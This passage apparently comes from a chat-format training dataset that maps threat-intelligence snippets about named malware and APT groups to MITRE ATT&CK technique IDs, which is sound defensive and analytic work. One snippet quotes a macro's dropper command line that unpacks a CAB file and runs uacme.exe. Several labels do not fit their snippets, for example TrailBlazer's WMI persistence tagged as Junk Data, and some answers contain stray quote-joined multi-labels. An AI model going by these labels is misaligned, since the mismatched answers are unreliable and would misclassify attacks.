or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT uses WMI to query the Windows Registry." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group malware has collected Microsoft Office documents from mapped network drives." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT19 HTTP malware variant decrypts strings using single-byte XOR keys." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has infected victims by tricking them into visiting compromised watering hole websites." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "operates over ports 21 and 20." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar has used compromised WordPress blogs as C2 servers." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An official website of the United States government . Here’s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you’ve safely connected to the .gov website. O’Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China’s intelligence service access to sensitive business information,” said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer’s operating system. Such malware enabled members of the APT10 Group to monitor victims’ computers remotely and steal user credentials" }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has queried the Registry to identify victim information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module for enumerating TCP and UDP network connections and associated processes using the \"netstat\" command." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adbupd can run a copy of cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains code to delete files from the victim’s machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor’s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the ‘Winnti umbrella and linked groups’, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has used .PNG images within a zip file to build the executable." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo can send the data it collects to the C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes it’s keylog to a registry key that it uses as a buffer" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1574.013 - KernelCallbackTable', 'T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities.. . This scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain Controller and the File Server:" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete malware used Python’s urllib library to make HTTP requests to the C2 server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2)." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Visual Basic macro uses the following command line: cmd /c expand %TEMP%\\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe The control server credential information contained in the CAB files is different: Decoded credential data contained in another ipnet.ini" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Heyoka Backdoor can decrypt its payload prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several Ke3chang backdoors achieved persistence by adding a Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to set certain attributes such as creation/modification timestamps on files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can SSH to a remote service." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exfiltrated data in HTTP POST headers." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the \"lPH*.dll\" pattern." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page" }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C# implementation of the CharmPower command execution module can use \"cmd\"." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT has the ability to gather a list of files and directories on the infected system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encrypted documents and malicious executables." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan will then use the following regular expression to check the HTTP response to the content upload request for the file identifier value: \\”id\\”:(.*) The Trojan will use this file identifier value to monitor for changes made to the file by the actor by checking for changes to the modification time of the .txt file" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis will decrypt important strings used for C&C communication." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened. The actors also used batch scripting." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sys10 uses an XOR 0x1 loop to encrypt its C2 domain." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has executed malware with \"regsvr32s\"." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains commands to list files and directories, as well as search for files matching certain extensions from a defined list." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERTON can install a Registry Run key for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has used several packing methods for obfuscation." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can modify file attributes to hide files." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can start SOCKS proxy threads." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI has used FTP for C2 communications." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) Passwords, like \"admin-na-google123!@#\" shown in Figure 4, are required to interact with the web shell" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mivast has the capability to open a remote shell and run basic commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 — a technique also used by SeaDuke — although this persistence mechanism is not exclusive to COZY BEAR.5" }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet gathers the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After gaining access to the victim’s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool. The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port. The tunnel is authenticated using the attacker’s private key" }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "modifies the time of a file as specified by the control server." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group has made significant improvements to their arsenal recently and has both developed new tools and modified existing ones. The key observations covered below are based on CrowdStrike® Intelligence analysis of BazarLoader, Conti and Ryuk operations" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOMEFRY uses a command-line interface." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download or upload files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains junk code in its binary, likely to confuse malware analysts." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has deleted Windows Event Logs to hinder forensic investigation." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16)" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron uses AES to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Green Lambert has created a new executable named `Software Update Check` to appear legitimate." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can test a connection to a specified network IP address over a specified port number." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used the “net view” command to locate mapped network shares." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method" }, { "role": "assistant", "content": "T1056.004 - Input Capture: Credential API Hooking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Further reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe are used." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a 